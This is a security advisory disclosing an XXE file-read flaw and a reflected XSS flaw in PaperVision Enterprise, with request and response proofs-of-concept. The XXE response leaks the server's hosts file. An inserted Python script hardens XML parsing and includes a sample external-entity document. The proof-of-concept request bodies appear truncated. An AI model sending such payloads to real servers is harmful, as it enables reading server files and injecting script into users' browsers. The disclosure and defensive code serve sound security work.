Trustwave SpiderLabs Security Advisory TWSL2017-001:
Multiple Vulnerabilities in Digitech Systems PaperVision Enterprise

Published: 01/11/2017
Version: 1.0

Vendor: Digitech Systems (http://www.digitechsystems.com/)
Product: PaperVision Enterprise
Version affected: Prior to release 81.1

Product description:
PaperVision Enterprise Content Management (ECM) system offers all the same features and functionality of an on-premise ECM system.

Finding 1: XML External Entity (XXE) Injection
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs

By design, XML documents can reference the content of files on the local file system or remote locations using "external entities", also known as "system entities". This functionality forces the XML parser of the application to access the resource specified. Therefore, it is possible to inject an XML DOCTYPE "SYSTEM" directive to access local files on the operating system. Using this technique, it is possible to access any file on the server readable by the application service user. This attack can also be used to create a possible denial of service condition by reading devices such as /dev/zero, which produce a never-ending stream of characters. This could fill up the server's memory and tie up threads if multiple requests were sent.
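As an added, defender-side illustration (this is not code from the advisory, from Trustwave, or from Digitech Systems), the Python script below shows the two controls that close off the entity resolution described above: refusing any request body that carries a DOCTYPE or ENTITY declaration before it ever reaches a parser, which is the same effect as setting DtdProcessing.Prohibit on the XmlReaderSettings an ASP.NET handler uses, and parsing with the expat SAX reader's external-general-entity feature switched off so that a declared SYSTEM entity yields no data. Both sample documents, the entity name "xxe" and the file:// placeholder path are constructed for this example; nothing is read from disk.

```python
"""Added example, not code from the advisory or from PaperVision.

Two layered defenses against the SYSTEM-entity resolution described in
Finding 1:
  1. reject_dtd()                      - refuse any document that declares a
                                         DTD or ENTITY before a parser sees it
  2. parse_without_external_entities() - parse with expat's SAX reader and
                                         external general entities disabled
The sample documents below are constructed for this example.
"""
import io
import re
from typing import Optional, Tuple
import xml.sax
from xml.sax import handler

# A DOCTYPE or ENTITY declaration is the only way to introduce an external
# entity, so its presence in an API request body is itself the signal.
_DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def reject_dtd(document: bytes) -> Optional[str]:
    """Return a rejection reason if the document declares a DTD, else None."""
    match = _DTD_MARKER.search(document)
    if match is None:
        return None
    return "DTD/ENTITY declaration at byte offset %d" % match.start()


class _TextCollector(handler.ContentHandler):
    """Collects character data so callers can see exactly what was expanded."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks = []

    def characters(self, content: str) -> None:
        self.chunks.append(content)


def parse_without_external_entities(document: bytes) -> str:
    """Parse with external general entities disabled; return the text content.

    With feature_external_ges off, expat's SAX reader returns from the
    external-entity callback without opening the referenced resource, so a
    SYSTEM entity contributes no characters at all (CPython 3.7.1+ already
    defaults to off; it is set explicitly here so the intent is visible).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.chunks)


def hardened_parse(document: bytes) -> Tuple[bool, str]:
    """Apply both controls: (True, text) when accepted, (False, reason) when not."""
    reason = reject_dtd(document)
    if reason is not None:
        return False, reason
    return True, parse_without_external_entities(document)


# Constructed inputs: an ordinary request body, and one shaped like the
# Finding 1 document (placeholder path; the entity is never resolved).
BENIGN = b"<request><query>invoice 42</query></request>"
WITH_EXTERNAL_ENTITY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE request [<!ENTITY xxe SYSTEM "file:///placeholder/path">]>'
    b"<request>&xxe;</request>"
)

if __name__ == "__main__":
    # (True, 'invoice 42')
    print(hardened_parse(BENIGN))
    # (False, 'DTD/ENTITY declaration at byte offset 21')
    print(hardened_parse(WITH_EXTERNAL_ENTITY))
    # '' -- the entity reference produced no data at all
    print(repr(parse_without_external_entities(WITH_EXTERNAL_ENTITY)))
```

On the IIS/.NET 4.0 stack the response headers show, the equivalent of reject_dtd is XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit with XmlResolver set to null on every reader the handler creates; the same "<!DOCTYPE" check applied by a WAF or request filter to text/xml bodies posted to /HTTPIntNet.aspx also gives a clean detection signal, since legitimate API traffic to an endpoint like this has no reason to carry a DTD. Prohibiting the DTD also removes the /dev/zero-style resource-exhaustion case mentioned above, because the parser never opens the device.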
Proof-of-Concept:

The following PoC shows an example by sending the SYSTEM directive to access the "C:/WINDOWS/System32/drivers/etc/hosts" file:

REQUEST:
========
POST /HTTPIntNet.aspx HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: text/xml; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 192
Cookie:
Connection: close

]>
&xxe;

RESPONSE:
=========
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 11 Oct 2016 22:59:13 GMT
Connection: close
Content-Length: 923

There is no function named # COPYRIGHT (C) 1993-2009 MICROSOFT CORP.
#
# THIS IS A SAMPLE HOSTS FILE USED BY MICROSOFT TCP/IP FOR WINDOWS.
#
# THIS FILE CONTAINS THE MAPPINGS OF IP ADDRESSES TO HOST NAMES. EACH
# ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. THE IP ADDRESS SHOULD
# BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
# THE IP ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
# SPACE.
#
# ADDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
# LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
#
# LOCALHOST NAME RESOLUTION IS HANDLED WITHIN DNS ITSELF.
# 127.0.0.1 LOCALHOST
# ::1 LOCALHOST

Finding 2: Authenticated Cross-Site Scripting (XSS)
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs

Proof-of-Concept:

The following shows a reflected XSS payload injected in the 'printTextOnly' parameter:

REQUEST:
========
GET /ExportResults.aspx?printTextOnly= HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: [Snipped]
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE:
=========
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 12 Oct 2016 00:45:47 GMT
Connection: close
Content-Length: 135

Remediation Steps:
Contact Digitech Systems for the PaperVision 81.1 release update. PaperVision release 82 will also address these findings. Please note that Trustwave SpiderLabs has not verified this fix.

Revision History:
10/18/2016 - Vulnerability disclosed to vendor
11/10/2016 - Patch released by vendor
01/06/2017 - PaperVision Enterprise release 82 became available
01/11/2017 - Advisory published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions.
Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.